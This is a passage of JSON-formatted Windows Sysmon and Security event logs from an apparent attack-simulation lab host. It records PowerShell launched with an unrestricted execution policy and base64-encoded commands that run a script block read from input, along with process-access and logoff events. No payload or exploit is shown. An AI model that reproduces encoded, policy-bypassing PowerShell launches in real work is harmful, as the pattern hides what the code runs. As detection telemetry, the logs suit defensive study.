gBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.866","ProcessGuid":"{41C8662E-20CF-5F25-0000-00103D040800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CF-5F25-0000-00209EF40700}","LogonId":"0x7f49e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{41C8662E-20CF-5F25-0000-00105DF80700}","ParentProcessId":"4720","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5067,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.862\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00105DF80700}\r\nSourceProcessId: 4720\r\nSourceThreadId: 4612\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-00103D040800}\r\nTargetProcessId: 2872\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e82ed6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66323fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66323c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66dd5096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+662e4817(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66342ce6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6632634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6632634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663261dc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66318161(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66324694(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66324287(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66323fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66323c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66dd5096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6630aae2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6630a0b2(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.862","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00105DF80700}","SourceProcessId":"4720","SourceThreadId":"4612","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-00103D040800}","TargetProcessId":"2872","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e82ed6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66323fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66323c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66dd5096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+662e4817(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66342ce6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6632634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6632634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663261dc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66318161(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66324694(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66324287(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66323fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66323c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66dd5096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6630aae2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6630a0b2(wow64)","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5068,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.862\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-00103D040800}\r\nTargetProcessId: 2872\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.862","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-00103D040800}","TargetProcessId":"2872","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5069,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.862\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.862","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220563,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7A60B\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7a60b","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220564,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7BDBF\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7bdbf","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220565,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7CAEC\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7caec","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
